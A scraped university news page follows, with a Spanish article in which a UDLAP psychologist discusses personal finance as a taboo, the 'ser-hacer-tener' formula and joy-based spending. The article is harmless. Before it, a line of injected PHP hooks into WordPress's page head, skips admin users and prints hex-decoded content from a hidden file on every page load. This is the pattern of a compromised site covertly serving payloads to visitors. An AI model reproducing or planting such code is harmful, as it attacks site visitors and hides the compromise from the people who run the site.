if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Hablar de finanzas personales sigue siendo un tabú: Especialista UDLAP – La Opinión Universitaria La Opinión Universitaria
Menu

Hablar de finanzas personales sigue siendo un tabú: Especialista UDLAP

 

  • Comentó que para poder lograr unas finanzas personales adecuadas, primero debemos considerar la fórmula del “ser-hacer-tener”

Por Diego Cuautle

Pocas veces pensamos en nuestras finanzas personales, este es un tema sobre el que nadie te enseña, incluso suele ser un tabú hablar sobre él. Y la realidad es que hoy es más complejo administrar nuestros ingresos que antes, lamentaron Rocío Álvarez Bauza, Psicóloga Organizacional y Health Coach, egresada de la Universidad de las Américas Puebla (UDLAP).

En entrevista, la especialista comentó que la forma en que consigues el dinero, es la manera en que te comportas en la vida. Por ejemplo, “las mujeres tenemos muchas cosas por hacer, queremos ser más productivas y comprar todo lo que deseamos. Esto nos estresa y nos aleja del camino de la felicidad”.

En este sentido, comentó que para poder lograr unas finanzas personales adecuadas, primero debemos considerar la fórmula del “ser-hacer-tener”. Creemos equivocadamente que debemos hacer algo para obtener algún bien, es decir, primero hacer, luego tener y al final ser.

Agregó que si consideramos en primer lugar el “ser”, podemos cuestionar ¿por qué hacemos este gasto? ¿Lo estoy haciendo por moda o compromiso? ¿Pienso que mientras más cosas tenga seré más aceptada?. Una vez que lo hago consciente, puedo entonces dejar de actuar a través del “hacer-tener-ser”.

Destacó que una vez que tenemos clara nuestra definición de abundancia, podemos analizar cómo gastamos el dinero. “Según Marisha Thakor, quien es autora de los libros “Get financialy naked” y “On my own two feet”, el camino hacia la verdadera riqueza y la estabilidad financiera, consiste en enfocar el flujo del dinero en las cosas que te brindan la mayor alegría en tu vida.

“Pasamos casi todo el día trabajando, y a cambio de eso, ganamos dinero… y cuando lo gastamos, lo que en realidad estamos gastando es la energía de nuestras vidas, porque ese dinero significó energía invertida. Prestar atención a tu flujo de fondos, es una manera de honrarnos a nosotras mismas y al esfuerzo que invertimos en obtenerlo”, explicó.

Finalmente dijo que “gastar basándote en la alegría”, es una forma de asegurar que tu dinero está siendo encaminado hacia las cosas que verdaderamente optimizan tu felicidad.

  • Tweets recientes